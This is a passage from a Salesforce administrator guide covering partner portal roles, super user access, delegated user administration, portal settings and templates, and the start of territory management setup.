role is immediately under the Partner Executive role. The Partner User role is immediately under the Partner Manager
role. Each role includes the partner account name as part of the role name. For example, if the partner account name is
Acme, the three roles are Acme Partner Executive, Acme Partner Manager, and Acme Partner User. If the ownership
of a partner account is changed to another channel manager, the partner user role is moved to that location in the role
hierarchy.

Note:  Be careful managing your role hierarchy. Partner users at a given role level are always able to view and
edit all data owned by or shared with users below them in the hierarchy, regardless of your organization’s sharing
model. Use administrative reports to manage your partner roles.

Accounts with different portal types have a separate role hierarchy for each portal. Role names include the portal type
with which they are associated. For example, if Account A has both a partner portal and a Customer Portal, then roles
for the Customer Portal are named “Account A Customer User” and roles for the partner portal are named “Account A
Partner User.”

All users in a partner user role have read access to all contacts under their partner account even when the contact sharing
model is private. Partner users have read-write access to tasks associated with any object they can access. They also have
read access to events associated with any object they can access. Partner users have the same access to Salesforce Knowledge
articles as the account owner.

To view the roles assigned to your partner portal users, create a custom report, choose Administrative Reports, select
Users as the data type, and add Role to your report columns.

Deletion of Partner Portal Roles

When you delete partner portal roles, the roles are renamed to maintain the hierarchy. For example, if the Manager role
is deleted from a three-role hierarchy of Executive, Manager, and User, then the Executive role is renamed to Manager
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but its ID remains the same. When you create a partner portal role, the hierarchy of the new portal role is automatically
determined and created bottom-up.

You can delete multiple roles in bulk for better performance. For example, if most of your users are assigned the User
role, you can delete the Executive and Manager roles. For more information on deleting partner roles, see the SOAP API
Developer's Guide.

Super User Access

Users can be assigned super user access to give them access to data owned by other users belonging to the same role or
those below in the hierarchy. For example, a Partner Manager with super user access can see data owned by other users
in the Partner Manager role and the Partner User roles.

Partner Portal User Licenses

Partner portal users cannot perform all of the functions that a Salesforce user can because partner portal users are assigned
to a special type of user license.

See Also:
Partner Portal Overview
Enabling the Partner Portal

Assigning Partner Super User Access

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create, edit, disable, or deactivate users:

“Create” on contactsTo create contacts:

“Read” on contactsTo view contacts:

Partner users can be assigned one of three roles: Partner Executive, Partner Manager, or Partner User (worker role).

Can AccessPartner Super Users with Role

Data owned by all partner users and partner super users in the
same role and those below them in the hierarchy (Manager
and User roles).

Partner Executive

Data owned by all partner users and partner super users in the
same role and those below them in the hierarchy (User roles).

Partner Manager

Data owned by all partner users and partner super users in the
same role (User roles).

Partner User (worker role)
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Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

To enable Partner Super User Access for your partner portal, see Enabling Partner Super User Access.

• To assign super user access, go to the contact detail page of a partner account, click Manage External User and select
Enable Super User Access.

• To remove partner super user access, go to the contact detail page of a partner account, click Manage External User and
choose Disable Super User Access.

Consider these guidelines:

• Partner super users can access the data owned by other partner users and partner super users of the same role or those below
them in the portal account hierarchy, even if the organization-wide default setting is Private.

• Partner super user access applies to cases, leads, custom objects, and opportunities only. Consider two partner super users
with the same role under the same account, User A owns a few opportunities, and User B has manual share to another
opportunity. Then User A will have access to all opportunities including those that User B has access to.

See Also:
Partner Portal Settings

Enabling Partner Users to Request Meetings

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up and update the partner portal:

“Manage Users”To create and edit profiles:

“Customize Application”To set up the request a meeting feature:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

After you enable your partner portal and set up the Request a Meeting feature, complete the following steps to let your Partner
users request meetings with contacts, leads, and person accounts:

1. Update your custom Partner User profiles:
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Include the “Send Email” and “Edit Events” user permissions.a.
b. Verify that the tab visibility for the Contacts and Leads tabs is Default On.

2. Ensure that the custom Partner User profile is active and assigned to your Partner users.

See Also:
Partner Portal Overview
Enabling the Partner Portal

Delegating Partner User Administration

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage External Users”To manage partner portal users:

“Manage Users”To create, edit, and delete profiles:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

You can delegate a subset of administrative rights to external users that have a partner user license. Delegated external user
administrators can perform any of the following tasks for users, including both customer users and partner users, associated
with their account:

• Create external users

• Edit external users

• Reset passwords for external users

• Deactivate existing external users

Note: When a delegated external user administrator deactivates a portal user, the administrator doesn't have the
option to remove the portal user from any teams that user is a member of.

You must use the original profile user interface to delegate administration rights for a partner user. If you're using the enhanced
profile user interface, disable it temporarily in the User Interface settings to complete this procedure.

To delegate a partner user administration rights:

1. From Setup, click Manage Users > Profiles and click a custom partner profile.

You cannot edit the Partner User profile.
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2. Click Edit.
3. Select Delegated External User Administrator.
4. Click Save.
5. Click Edit in the Delegated External User Profiles related list.
6. Select the external user profiles you want users with this profile to be able to administer. An external user delegated

administrator can manage external users with Customer Portal, partner portal, or Communities profiles, as long as the
users with the profile are under the same account.

7. Click Save.

To change which profiles a delegated external user administrator can edit:

1. From Setup, click Manage Users > Profiles and click a custom partner profile.

You cannot edit the Partner User profile.

2. Click Edit in the Delegated External User Profiles related list.
3. Select the external user profiles you want users with this profile to be able to administer.
4. Click Save.

Delegated portal user administrators can click Manage External User, then View Partner User on the contact's detail page
to view and edit the partner portal user's details:

• Click Edit to edit a partner portal user's details.

• Click Reset Password to reset the partner portal user's password.

• Click Edit and deselect the Active checkbox to deactivate the user.

Note:  Delegated partner user administrators can update portal users on any account to which they are transferred.

Tips on Setting Up Delegated Portal User Administration

Consider the following when setting up delegated portal user administration:

• On the profile of users for which you are granting delegated portal administration:

◊ Add the “Create” and “Edit” permissions on contacts so that delegated portal administrators can create and update
contacts related to their account.

◊ Set the Accounts and Contacts tab settings to Default On so that delegated portal administrators can view the Accounts
and Contacts tabs and easily manage contacts related to their accounts.

• Add the Accounts and Contacts tabs to your portal.
• Set field level security and page layouts so that delegated portal user administrators can only access the account, contact,

and case fields you specify.

See Also:
Partner Portal Overview
Enabling the Partner Portal
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Enabling the Partner Portal
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable the partner portal:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

To enable the partner portal:

1. From Setup, click Customize > Partners > Settings.
2. Click Edit.
3. Select the Enable Partner Portal checkbox.
4. Click Save.

Note:  After you enable the partner portal, you cannot disable it. However, you can prevent users from logging into
your partner portal. For more information, see Partner Portal Configuration on page 1480.

After you enable the partner portal for your organization, you can then create one or more partner portals to satisfy the various
business needs of your customers..

When you enable the partner portal, the following items are automatically added to your organization:

Partner User profile

You can assign partner portal users to profiles cloned from this profile. For each cloned profile, verify that the “API Only
User” permission is not selected; if this permission is selected, users associated with the profile will not be able to log in
to the partner portal.

Enable As Partner button on account records

Allows you to create a partner account.

Enable Partner Portal User and View Partner Portal User buttons on contact records

Allows you to create a new partner user or view existing partner users.

“All Partner Portal Users“ and “All Internal Users” groups along with the “Roles and Internal Subordinates” sharing
rule category

You can use these groups and the sharing rule category to easily create sharing rules that grant all of your partner portal
or Salesforce users access to specific data.
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DescriptionGroup or Category

Contains all partner portal users in your organizationAll Partner Portal Users group

Contains all Salesforce users in your organizationAll Internal Users group

Allows you to create sharing rules in which you can choose
specific Salesforce users in your organization by role plus

Roles and Internal Subordinates sharing rule category

all of the users in roles below that role, excluding any
partner portal roles

See Also:
Partner Portal Overview
Partner Portal Settings

Partner Portal Configuration
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To configure a partner portal:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

Once you have created a partner portal, you can customize it to meet your business needs. By customizing your partner portal,
you can satisfy the needs of your various channels.

To customize your partner portal:

1. From Setup, click Customize > Partners > Settings.
2. Click the name of the portal you wish to customize.
3. Configure the portal settings and communication templates.
4. Configure the fonts and colors used on the portal.
5. Configure the available tabs for the portal.
6. Assign partner profiles to the portal.
7. Configure portal languages.
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8. Optionally, add the Partner Portal Welcome component to home page layouts assigned to portal users. The welcome
component displays a welcome message with the user's name, their channel manager's name, and links to their company
and personal profiles.

9. Optionally, add the Partner Portal Lead Inbox component to home page layouts assigned to portal users. When a user
logs in to your portal, they see a list of leads for their lead queues. The user can click Accept next to a lead to take ownership
of it; they won't see complete lead details until they click Accept.

See Also:
Partner Portal Overview
Partner Portal Settings

Assigning Partner Profiles to Partner Portals
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To assign partner profiles to partner portals:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

Portal users can only log into partner portal assigned to their profile. To assign a profile to a partner portal:

1. From Setup, click Customize > Partners > Settings.
2. Select the name of your partner portal.
3. Click Edit Profiles in the Assigned Profiles section.
4. Select the Active checkbox next to the profile you want to assign to the portal.

A portal user can access all the partner portals assigned to his or her profile with one username and password.

You can view the number of active users associated with each profile assigned to a partner portal on the Users field on the
Assigned Profiles section.

See Also:
Partner Portal Overview
Partner Portal Settings
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Partner Portal Best Practices
Available in: Enterprise, Unlimited, and Developer Editions

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

Implementation Tips

• Portal users can only log into partner portals assigned to their profile.

A portal user can access all the partner portals assigned to his or her profile with one username and password.

You can view the number of users associated with each profile assigned to a partner portal on the Users field on the
Assigned Profiles section.

• The login URL of each partner portal you create contains a unique identifier, such as portalId=060D00000000Q1F.
You can find this identifier on the portal detail page. The unique identifier determines the specific portal a user can access.
If a user accesses a login URL that does not contain a unique identifier, they are automatically directed to the login URL
of the first partner portal you created. Note that portal users can only log into a partner portal using the portal's login page
and not through the Salesforce login page.

• The settings on the following items apply to both your organization and your partner portals:

◊ List views
◊ Search layouts
◊ Workflow alerts

Best Practices

• Because you can uniquely customize the fonts, colors, email templates, and login message of each partner portal you create,
you can build a partner portal for each partner organization supported by your organization, or for different partner tiers
or communities.

Note:  JavaScript and CSS code are automatically removed from HTML files used as the portal login message.

• You cannot delete a partner portal, but you can prevent users from logging into a portal by deselecting the Login Enabled
checkbox.

• You can create multiple partner portals that display different tabs for users with the same profile, as long as the profile has
access to each object displayed on a tab.

• You can set the default number of roles for partner portal accounts. This benefits your partner portal by reducing the
number of unused roles.

• When you enable the partner portal, the default portal will be set as Login Enabled. Disable that setting, and re-enable
it when the default portal is ready for partner users to login.

• Let your partner users know they can make their channel manager the owner of an object.
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• Create a home page layout for your partner users with custom links to frequently used features.
• Include the Partner Portal Welcome component on home page layouts assigned to partner portal users. When users log

in to your portal they receive a welcome message with their name, their channel manager's name, and links to both their
company and personal profiles. They can click the linked channel manager name to send an email to that person. When
portal users change information about themselves their user record is automatically updated but their contact record is not.

• Customize the Custom Links home page component to include links that your partner users can use, or remove it from
the home page layout.

• Partner users cannot set reminders on tasks. Create a process to help them manage their tasks without reminders.
• You can add the Partner Portal Lead Inbox component on home page layouts assigned to partner portal users.We recommend

hiding important lead fields, such as Company Name and Lead Name, from partner portal users so that they don't
selectively choose which leads to accept.

See Also:
Partner Portal Overview

Tips for Setting Up Partner Portal Channel Managers
Available in: Enterprise, Unlimited, and Developer Editions

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

Channel managers are the internal users that manage your partners. Before enabling a portal, you need to ensure your channel
managers have the appropriate permissions so they can manage partners.

The two main areas available for configuring your channel managers are profiles and roles.

Channel Manager Roles

Your role hierarchy determines what data your users can access. Users can always view and edit records that they own. In
addition, users can always view, edit, and report on data owned by or shared with users below them in your role hierarchy.
Channel manager roles are always directly above their partner users' roles in the hierarchy, giving channel managers access to
all of the data owned by the partners they manage. When partner users are created on a partner account, Salesforce automatically
places the partner users' role beneath the role of the channel manager who owns that partner account.  To help you manage
your channel managers and partner users, create a logical channel manager role structure.

Channel Manager Profiles

Profiles determine the permissions users have, page layouts they see, the tabs and record types available to them, and other
settings. Create a unique profile and design its settings specifically for channel managers. Use these tips when creating this
profile:
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Make the following tabs available to channel managers
Leads, Accounts, Contacts, Opportunities, Documents, and Products. Also, if you plan to use Solutions or custom
objects, make them available to your channel managers.

Assign record types
Assign the appropriate lead record types to your channel manager profiles.

Assign page layouts
Assign the appropriate page layouts to your channel manager profiles. Ensure that the Enable Partner Portal Login
and View Partner Portal User buttons are included on the contact page layout for your channel managers.

Enable the “Manager Partners” permission
When this permission is enabled, channel managers can enable new partner accounts and partner users.

Make the Partner Account field visible to channel managers on leads, accounts, and opportunities
This allows channel managers to create list views or reports for tracking partner user activity.

Make the Last Transfer Date field visible to channel managers on leads
This allows channel managers to create lists views or reports for tracking partner user activity.

Additional Tips

• Create a public group for channel managers. You can use this group for filtering and controlling access to documents.
• Create a lead queue for channel managers. You can use this queue for lead assignment rules.

See Also:
Partner Portal Overview
Partner Portal Settings

Partner Portal Default Communication Templates
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To modify default partner portal communication templates:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.
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You can set default communication templates for your partner portals. Default communication templates will be used for
partner communication unless you have specified templates for a particular portal. In addition, if a partner user is assigned to
more than one portal, the default communication templates will be used when communicating with that user.

To set the default communication templates for the partner portal:

1. From Setup, click Customize > Partners > Settings.
2. Click Set Default Email Templates for All Portals
3. Click Edit.
4. Set the following options:

Email Notification Settings

DescriptionSetting

The email address from which all partner portal
communication templates are sent, for example,

From Email Address

“support@acme.com.” Salesforce sends the emails
automatically, but they appear to portal users as if they were
sent from this email address. If a portal user responds to a
communication template, the response is sent to this address.

The name associated with the “From” Email Address, for
example, “Acme Partner Support.”

From Email Name

The email template used to send a username and initial
password to all newly-enabled partner portal users. By

New User Template

default, a sample template is automatically selected for you.
This template must be marked as Available for Use.

The email template used to send a new password to existing
partner portal users when you reset their passwords.

New Password Template

The email template used to send a new password to existing
partner portal users when they reset their own passwords by

Lost Password Template

clicking Forgot your password? on the login page of the
partner portal.

The email template used to send a notification to partner
portal users when they become the new owner of a record
in the portal.

Change Owner to Portal User Template

5. Click Save.

See Also:
Partner Portal Overview
Partner Portal Settings
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Customizing the Partner Portal Lead Inbox Component
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable and customize the Partner Portal Lead Inbox
component:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

Include the Partner Portal Lead Inbox component on home page layouts assigned to partner portal users. When a user logs
in to your portal, they see a list of leads for their lead queues. The user can click Accept next to a lead to take ownership of it;
they won't see complete lead details until they click Accept.

Note:  The Lead Inbox only displays on the user's home page when there are leads to accept. When the user accepts
a lead, they become the owner of the lead and the lead disappears from the Lead Inbox.

After you add the component to home page layouts assigned to portal users, you can choose the columns that show up:

1. From Setup, click Customize > Partners > Settings.
2. Click the name of your partner portal.
3. Click Customize Lead Inbox.
4. Add, remove, or rearrange fields from the Selected Fields list.

Note: We recommend hiding important lead fields, such as Company Name and Lead Name, from partner
portal users so that they don't selectively choose which leads to accept.

5. Click Save.

See Also:
Partner Portal Overview
Partner Portal Settings
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About Partner Portal User Management
Available in: Enterprise, Unlimited, and Developer Editions

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

There are two types of users for partner portals—channel managers and partner users.

Channel managers are the internal users that manage your partners. Before enabling a portal, you need to ensure your channel
managers have the appropriate permissions so they can manage partners.

Partner users are Salesforce users with limited capabilities. They are external to your organization but sell your products or
services through indirect sales channels. They are associated with a particular partner account, have limited access to your
organization's data, and log in via a partner portal.

The following table shows the storage per license as well as which features the partner user can access on the portal.

Gold Partner License Type

5 MB of data storage per userStorage per license

YesDocuments

YesMy Account Profile

YesLeads

YesCustom Objects

Yes. Users can submit records for approval and view the status
of approval requests in the Approval History related list on
record detail pages, but can't be assigned as approvers.

Approvals

YesAccounts

YesOpportunities

YesSalesforce CRM Content (Read Only)

YesReports

YesDelegated External User Administration

YesEmail
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Gold Partner License Type

YesCases

See Also:
Partner Portal Overview
Partner Portal Settings

Setting Partner Portal Role and User Defaults
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set the number of roles per portal account

“Customize Application”To enable partner super user access

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

You can set these partner portal role and user defaults:

• Set the default number of roles for partner portal accounts on page 1489

• Enable Partner Super User Access on page 1490

See Also:
Partner Portal Overview
Partner Portal Settings
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Roles Per Partner Portal Account

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set the number of roles per portal account:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

You can set the default number of roles for partner portal accounts. This benefits your partner portal by reducing the number
of unused roles. You can set up to three roles; the system default is three.

For example, if you currently have three roles created when an account is enabled for your partner portal, but only need one
role for new accounts, you can reduce the number of roles to one.

To set the number of roles per partner portal account:

1. From Setup, click Customize > Partners > Settings.
2. Click Set Portal Role and User Defaults.
3. In the Portal Role and User Defaults page, click Edit.
4. In the Number of Roles drop-down list, set your default number of roles per partner portal account.
5. Click Save.

The number of roles for existing portal accounts doesn't change with this setting.

See Also:
Partner Portal Overview
Partner Portal Settings
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Enabling Partner Super User Access

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable Partner Super User Access:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

You must have a partner portal enabled to use Partner Super User Access.

To enable Partner Super User Access:

1. Click From Setup, click Customize > Partners > Settings..
2. In the Partner Relationship Management Settings page, click Set Portal Role and User Defaults.
3. Click Edit and select the Enable Partner Super User Access checkbox.

You can disable Partner Super User Access by deselecting the Enable Partner Super User Access checkbox. However,
if you reenable this feature, all users who were assigned Super User Access before the feature was disabled will automatically
gain Super User Access again. See Assigning Partner Super User Access for more information.

See Also:
Partner Portal Overview
Partner Portal Settings

1490

Setting Partner Portal Role and User DefaultsAdministering People and Organizations That Users Sell To



Tracking Partner Activity
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on the type of record included in the listTo create custom list views:

“Run Reports”

AND

“Read” on the records included in reports

AND

“Create and Customize Reports”

To create, edit, save, and delete reports:

“Manage Dashboards”To create, edit, and delete dashboards:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

Tracking partner activity is important to ensure that your leads and opportunities are being managed effectively. Using the
Partner Account field on leads and opportunities, you can create custom reports and list views that help you track the
work partner users are doing.

Tip:  When creating a list view or report, to include all leads or opportunities associated with a partner account, use
“Partner Account not equal to” and leave the third field in the filter blank.

Tips for tracking partner user activity:

• Create list views to indicate partner lead and opportunity activity during the last week.

• Create a dashboard showing the number of leads created in the last week that are owned by partners.

• Create a list view of leads assigned to partners that have not been updated recently.

• Create forecast reports on partner user opportunities.

• Use the lead Last Transferred Date field to search for leads that have not been acted upon in a timely fashion.

• If you are using customizable forecasting, assign a user as a forecast manager for each partner role in your forecast hierarchy.
Assigning someone as a forecast manager means that all forecasts from users below that user in the forecast hierarchy roll
up to that person.

Note:

When you transfer a partner portal user to another account:

◊ Opportunities on each account are automatically recalculated through your organization’s forecast hierarchy.
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◊ Opportunities owned by the partner portal user remain in the previous account.

See Also:
Partner Portal Overview
Partner Portal Settings

SETTING OPTIONS FOR SELLING

CUSTOMIZING TERRITORIES TO HELP YOUR USERS MANAGE
ACCOUNTS

Enabling Territory Management
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”To enable territory management:

Territory management is not enabled by default in Salesforce. To request territory management for your organization, contact
salesforce.com.

Note: Territory Management is available only with Customizable Forecasts and not supported with the Winter ’12
release of Forecasts. If Territory Management is enabled, you can no longer use the Winter ’12 release of Forecasts.

You must meet the following prerequisites before enabling territory management:

• Your organization must be using customizable forecasting in order to enable territory management. If you do not know
whether you have customizable forecasting, see Do I Have Customizable Forecasting? on page 1197.

• Follow the steps in the Deploying Territory Management Guide to prepare your organization for territory management.

After you have completed the prerequisites, you will be ready to turn on territory management for your organization:

1. In Salesforce, from Setup, click Manage Territories > Settings.
2. Optionally, change the organization-wide territory management settings that are configurable from the Territory Settings

page. See Configuring Territory Management Settings on page 1494.
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3. There are two different options for enabling territory management, which depend on your preference to retain or purge
preexisting forecast data. Click either Enable Territory Management or Enable Territory Management from Scratch.

What the Enable Territory Management Button Does

When you click this button, your organization’s current forecast hierarchy and forecast data are automatically copied
to the territory hierarchy as follows:
• The name of your organization is set as the top of the territory hierarchy.
• For each role in the forecast hierarchy, a corresponding territory is created in the new territory hierarchy.
• Manual forecast sharing settings on the roles are copied to the new territory. For more information on manual

forecast sharing, see Manually Sharing a Forecast on page 1592.
• Active Salesforce users are added to territories based on their roles.
• Opportunities are assigned to the opportunity owner’s territory.
• Accounts are not assigned anywhere in the territory hierarchy.
• Until you add or edit territories, your forecasts will work the same as they did before you enabled territory

management.

What the Enable Territory Management from Scratch Button Does

When you click this button, the following occurs:
• All preexisting forecast data is deleted.
• An empty territory hierarchy is created.

Using this button is only recommended when you are setting up a brand new organization in Salesforce that does
not have an existing forecast hierarchy.

Warning: Irreversible data loss can result from clicking Enable Territory Management from Scratch.

4. Configure territory-related fields, page layouts, and user permissions:

• From Setup, click Customize > Accounts:

◊ Click Fields to set the field-level security of the Territories and Exclude from territory assignment
rules fields.

◊ Click Page Layouts to add those fields to account page layouts. Also, for each account page layout, you can set
whether users can choose to run account assignment rules when they save accounts, and whether account assignment
rules should run by default whenever accounts are saved.

• From Setup, click Customize > Opportunities:

◊ Click Fields to set the field-level security of the Territory field.
◊ Click Page Layouts to add the field to opportunity page layouts.

• Using permission sets or profiles, grant the “Manage Territories” permission to users who will be administrators of the
territory hierarchy. Users that had the “Customize Application” permission before you enabled territory management
are automatically given the “Manage Territories” permission.
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5. To begin working with your new territory hierarchy, from Setup, click Manage Territories > Hierarchy. See Building
Your Territory Hierarchy on page 1495.

See Also:
Do I Have Customizable Forecasting?
Configuring Territory Management Settings
Administrator setup guide: Deploying Territory Management

Configuring Territory Management Settings
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”To configure territory settings:

You can set default account, contact, opportunity, and case access levels for new territories, as well as whether forecast managers
can administer the territories located below them in the territory hierarchy.

1. From Setup, click Manage Territories > Settings.
2. Choose default access levels for accounts, contacts (depending on your organization-wide default setting), opportunities,

and cases. These are the access levels that will be selected by default when a new territory is created. For descriptions of
these fields, see Territory Fields on page 1499.

Note:  These settings are not retroactive and do not affect territories that already exist.

When creating or editing an individual territory, you can override these default access levels. See Creating Territories
on page 1498.

3. Optionally, check Forecast managers can manage territories. When this box is checked, forecast managers
can administer subordinate territories: they can manage users, manually add accounts, and manage account assignment
rules for territories that are below their immediate territory. Also, they can add child territories to both their immediate
territory and lower territories. To learn more about forecast managers, see Assigning Forecast Managers in Your Forecast
Hierarchy on page 1590.

See Also:
Enabling Territory Management
Displaying and Editing Territories
Territory Management Overview
Building Your Territory Hierarchy
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Building Your Territory Hierarchy
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view territories:

“Manage Territories”

OR

You are a forecast manager, Forecast managers can
manage territories is selected, and you are working
below your position in the territory hierarchy.

To edit territories:

Note:  If you clicked the Enable Territory Management button to enable territory management, your existing forecast
hierarchy was used as the basis of the territory hierarchy.

To work with your organization's territory hierarchy, from Setup, click Manage Territories > Hierarchy. The following terms
are used when referring to territories in the hierarchy:

Parent Territory

A territory that is located immediately above another territory in the hierarchy. A territory has exactly one parent territory
in the hierarchy, except for the top-level territory which does not have a parent.

Child Territory

A territory that is immediately below another territory in the hierarchy. A parent territory can have an unlimited number
of child territories.

Sibling Territory

Child territories that share the same parent territory.

Choose an option from the drop-down list to change how the territory hierarchy is displayed:

Show in tree view

See a visual representation of the parent-child relationships between your territories. Click Expand All to see all territories,
or Collapse All to see only top-level territories. To expand or collapse an individual node, click the plus (+) or minus
(-) icon.

Show in sorted list view

See a territory list that you can sort alphabetically by territory name, parent territory (Reports to), or description.

To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to
define your own custom views.To edit or delete any view you created, select it from the View drop-down list and click
Edit.
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Show in list view

See a list of territories and their children, grouped alphabetically by the name of the top-level territory. The columns are
not sortable. This view is not available for hierarchies with more than 1,000 territories.

Each view provides links for you to create, edit, and delete territories.

See Also:
Managing Territories
Displaying and Editing Territories

Displaying and Editing Territories
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view territories:

“Manage Territories”

OR

You are a forecast manager, Forecast managers can
manage territories is selected, and you are working
below your position in the territory hierarchy.

To edit territories:

From the territory detail page, you can view and modify different aspects of the territory, including related territories, assigned
users, and included accounts.

Displaying Territories

1. From Setup, click Manage Territories > Hierarchy.
2. Select the name of the territory you want to view.

Viewing Related Territories

The Hierarchy list at the top of the territory detail page shows how this territory is related to the top-level territory in the
territory hierarchy. To see the names of other territories who share the same parent territory as this one, refer to the Siblings
list immediately below. In either list, you can click a territory name to view that territory. The territory detail page also includes
a Child Territories related list; see Working with Territory Related Lists on page 1497.

Editing Territories

To update an existing territory, click Edit, and then change the fields you want to modify. For more information, see Territory
Fields on page 1499 and Creating Custom Territory Fields on page 1500.

If an edit to a territory affects a very large amount of data, you will be sent a confirmation email when the operation has
completed.
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Note: When you edit groups, roles, and territories, sharing rules are usually automatically reevaluated to add or
remove access as needed. If these changes affect too many records at once, a message appears warning that the sharing
rules won't be automatically reevaluated, and you must manually recalculate them.

Cloning Territories

Click Clone to create a new territory with the same standard and custom field values as the current territory. The cloned
territory will have the same parent territory as the original territory. However, assigned users, account assignment rules, and
manually assigned accounts are not cloned.

Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

Viewing Accounts Assigned to a Territory

Click View Accounts to see a list of the accounts that have been assigned to this territory and territories below it in the territory
hierarchy. The list includes both manually assigned accounts and accounts that were assigned via rules.

Working with Territory Related Lists

Each territory detail page has the following related lists:

• Assigned Users - Lists the users in the territory. See Managing Users in Territories on page 1502.
• Inherited Account Assignment Rules - Lists the account assignment rules for this territory that are defined in a parent

territory. See Managing Account Assignment Rules on page 1506.
• Account Assignment Rules Defined in This Territory - Lists the account assignment rules for this territory. See Managing

Account Assignment Rules on page 1506.
• Manually Assigned Accounts - Lists the accounts that have been manually added to this territory. See Manually Assigning

Accounts to Territories on page 1514.
• Child Territories - Lists the territories located immediately below this territory in the territory hierarchy. Click Add

Territory to create a new child territory for this territory. Click a child territory name to view that territory's detail page.

Note: Hover over the links at the top of a detail page to display the corresponding related list and its records. If
Chatter is enabled, hover links display below the feed. An interactive overlay allows you to quickly view and manage
the related list items. Click a hover link to jump to the content of the related list. If hover links are not enabled,
contact your Salesforce administrator.

See Also:
Building Your Territory Hierarchy
Enabling Territory Management
Adding Forecast Managers to Territories
Creating Territories
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Creating Territories
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”

OR

You are a forecast manager, Forecast managers can
manage territories is selected, and you are working
below your position in the territory hierarchy.

To create territories:

You can create up to 500 territories for your organization. To create a new territory:

1. From Setup, click Manage Territories > Hierarchy > Add Territory. You can also click Add Territory from the Child
